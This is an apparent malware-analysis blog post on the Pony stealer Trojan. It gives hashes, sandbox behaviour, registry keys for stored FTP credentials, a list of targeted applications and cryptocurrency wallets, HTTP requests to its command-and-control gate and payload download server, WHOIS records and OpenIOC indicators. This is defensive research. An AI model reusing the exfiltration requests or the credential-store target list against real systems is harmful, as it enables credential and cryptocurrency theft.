Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/) . In this post we will try to cover the reversing of pony Trojan.

Tools required

  1. VMware
  2. IDA Disassembler
  3. OllyDbg Debugger
  4. Hex editor

First, we will examine its dynamic analysis behavior.

FILE NAME tt2.exe
FILE SIZE 209408 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 6245899b11a6bd6769b3656943322d13
SHA1 9879565d8c82e356cb7da62b9f04c3707cd3aac8
SHA256 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1
SHA512 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080
CRC32 906EA658
SSDEEP 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D
YARA None matched

Running it though Cuckoo we get the following basic details about it:

We now have an initial idea what the malware is doing. It can be summarized as:

  1. Connects to traffic.
  2. Has an anti-sandbox feature (based on time difference)
  3. Hooks and Reads browser data.
  4. Hides itself in ADS.

Look at some of its some of its registry modification or retrievals.

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar

HKEY_CURRENT_USER\Software\FlashFXP\3

HKEY_CURRENT_USER\Software\FlashFXP

HKEY_CURRENT_USER\Software\FlashFXP\4

HKEY_LOCAL_MACHINE\Software\FlashFXP\3

HKEY_LOCAL_MACHINE\Software\FlashFXP

HKEY_LOCAL_MACHINE\Software\FlashFXP\4

HKEY_CURRENT_USER\Software\FileZilla

HKEY_CURRENT_USER\Software\FileZilla Client

HKEY_LOCAL_MACHINE\Software\FileZilla

HKEY_LOCAL_MACHINE\Software\FileZilla Client

HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main

HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main

HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options

HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options

HKEY_CURRENT_USER\Software\BPFTP

HKEY_CURRENT_USER\Software\TurboFTP

HKEY_LOCAL_MACHINE\Software\TurboFTP

HKEY_CURRENT_USER\Software\Sota\FFFTP

HKEY_CURRENT_USER\Software\Sota\FFFTP\Options

HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles

HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites

HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

HKEY_CURRENT_USER\Software\FTP Explorer\Profiles

HKEY_CURRENT_USER\Software\VanDyke\SecureFX

HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher

HKEY_CURRENT_USER\Software\ExpanDrive\Sessions

HKEY_CURRENT_USER\Software\ExpanDrive

HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts

HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts

HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts

HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts

HKEY_CURRENT_USER\Software\FTPClient\Sites

HKEY_LOCAL_MACHINE\Software\FTPClient\Sites

HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites

HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites

HKEY_CURRENT_USER\SOFTWARE\LeapWare

HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare

HKEY_CURRENT_USER\Software\Martin Prikryl

HKEY_LOCAL_MACHINE\Software\Martin Prikryl

HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections

HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections

As you can see, it is evident that it is trying to look for stored password related information. Apart from stored credentials, it also steals bitcoin. Following is the list software it tries to steal from:

AR Manager FTPGetter Pocomail
Total Commander ALFTP IncrediMail
WS_FTP Internet Explorer The Bat!
CuteFTP Dreamweaver Outlook
FlashFXP DeluxeFTP Thunderbird
FileZilla Google Chrome FastTrackFTP
FTP Commander Chromium / SRWare Iron Bitcoin
BulletProof FTP ChromePlus Electrum
SmartFTP Bromium (Yandex Chrome) MultiBit
TurboFTP Nichrome FTP Disk
FFFTP Comodo Dragon Litecoin
CoffeeCup FTP / Sitemapper RockMelt Namecoin
CoreFTP K-Meleon Terracoin
FTP Explorer Epic Bitcoin Armory
Frigate3 FTP Staff-FTP PPCoin (Peercoin)
SecureFX AceFTP Primecoin
UltraFXP Global Downloader Feathercoin
FTPRush FreshFTP NovaCoin
WebSitePublisher BlazeFTP Freicoin
BitKinex NETFile Devcoin
ExpanDrive GoFTP Frankocoin
ClassicFTP 3D-FTP ProtoShares
Fling Easy FTP MegaCoin
SoftX Xftp Quarkcoin
Directory Opus FTP Now Worldcoin
FreeFTP / DirectFTP Robo-FTP Infinitecoin
LeapFTP LinasFTP Ixcoin
WinSCP Cyberduck Anoncoin
32bit FTP Putty BBQcoin
NetDrive Notepad + + Digitalcoin
WebDrive CoffeeCup Visual Site Designer Mincoin
FTP Control FTPShell Goldcoin
Opera FTPInfo Yacoin
WiseFTP NexusFile Zetacoin
FTP Voyager FastStone Browser Fastcoin
Firefox CoolNovo I0coin
FireFTP WinZip Tagcoin
SeaMonkey Yandex.Internet / Ya.Browser Bytecoin
Flock MyFTP Florincoin
Mozilla sherrod FTP Phoenixcoin
LeechFTP NovaFTP Luckycoin
Odin Secure FTP Expert Windows Mail Craftcoin
WinFTP Windows Live Mail Junkcoin
FTP Surfer Becky!

It copies itself into the system by using an integer filename, which is executed though a chain of ShellExecuteEx

FILE NAME 31780534.exe
FILE SIZE 317440 bytes
FILE TYPE PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 2bd7a3cc81ae70b16b2a85008fb7dd81
SHA1 7bf35f051a44dc31f0b138e1874e1d75745d49b3
SHA256 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856
CRC32 4AA8F5BD
SSDEEP 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M
YARA None matched

Not only does pony steal information, but it also downloads other malware, which are hardcoded in the binary itself

http://titratresfi.ru/gate.php POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0

Accept-Language: en-US

Content-Length: 270

Content-Type: application/octet-stream

Connection: close

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http://adishma.com/media/system/shost.exe GET /media/system/shost.exe HTTP/1.0

Host: adishma.com

Accept-Language: en-US

Accept: */*

Accept-Encoding: identity, *;q=0

Connection: close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Now let’s look at the network traffic it has generated.

Ethical Hacking Training – Resources (InfoSec)

It sends basic information to the command and control server, which we are going to examine deeply in the second post.

Network information

domain: TITRATRESFI.RU

nserver: ns1.entrydns.net.

nserver: ns2.entrydns.net.

state: REGISTERED, DELEGATED, VERIFIED

person: Private Person

registrar: R01-RU

admin-contact: https://partner.r01.ru/contact_admin.khtml

created: 2015.11.09

paid-till: 2016.11.09

free-date: 2016.12.10

source: TCI

Last updated on 2015.11.15 16:16:33 MSK

Domain Name: ADISHMA.COM

Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM

Sponsoring Registrar IANA ID: 303

Whois Server: whois.PublicDomainRegistry.com

Referral URL: http://www.PublicDomainRegistry.com

Name Server: NS1.SOFTONETECHNOLOGIES.COM

Name Server: NS2.SOFTONETECHNOLOGIES.COM

Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited

Updated Date: 07-sep-2015

Creation Date: 26-dec-2014

Expiration Date: 26-dec-2015

IOC

<Indicator id=”aae1b2d0-a5ad-471a-8c48-2296f6cfb49e” operator=”OR”>

<IndicatorItem condition=”is” id=”b1984833-80fe-446b-a3d8-3349822f6336″>

<Context document=”FileItem” search=”FileItem/Md5sum” type=”mir”/>

<Content type=”md5″>6245899b11a6bd6769b3656943322d13</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”e2168e97-5db8-4432-b498-8a5973deeb42″>

<Context document=”FileItem” search=”FileItem/Sha1sum” type=”mir”/>

<Content type=”sha1″>9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”f66fb3f0-1178-4638-bf06-24d131cfd2c7″>

<Context document=”FileItem” search=”FileItem/Sha256sum” type=”mir”/>

<Content type=”sha256″>15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>

</IndicatorItem>

<Indicator id=”81c75ab7-69b2-434d-808f-607a5b283cec” operator=”AND”>

<IndicatorItem condition=”is” id=”bb45ed4b-823c-41d0-8831-0ab41c874a7f”>

<Context document=”FileItem” search=”FileItem/FileName” type=”mir”/>

<Content type=”string”>Centrylink</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”9194b695-6af4-428f-b2cf-3a40c2560e78″>

<Context document=”FileItem” search=”FileItem/SizeInBytes” type=”mir”/>

<Content type=”int”>209408</Content>

</IndicatorItem>

<IndicatorItem condition=”is” id=”010608b2-0016-426d-9dce-2e9ad855f786″>

<Context document=”FileItem” search=”FileItem/PEInfo/PETimeStamp” type=”mir”/>

<Content type=”date”>2015-11-12T09:49:00Z</Content>

</IndicatorItem>

</Indicator>

Using VT we are able to map other files which are using the same location for downloading other malware.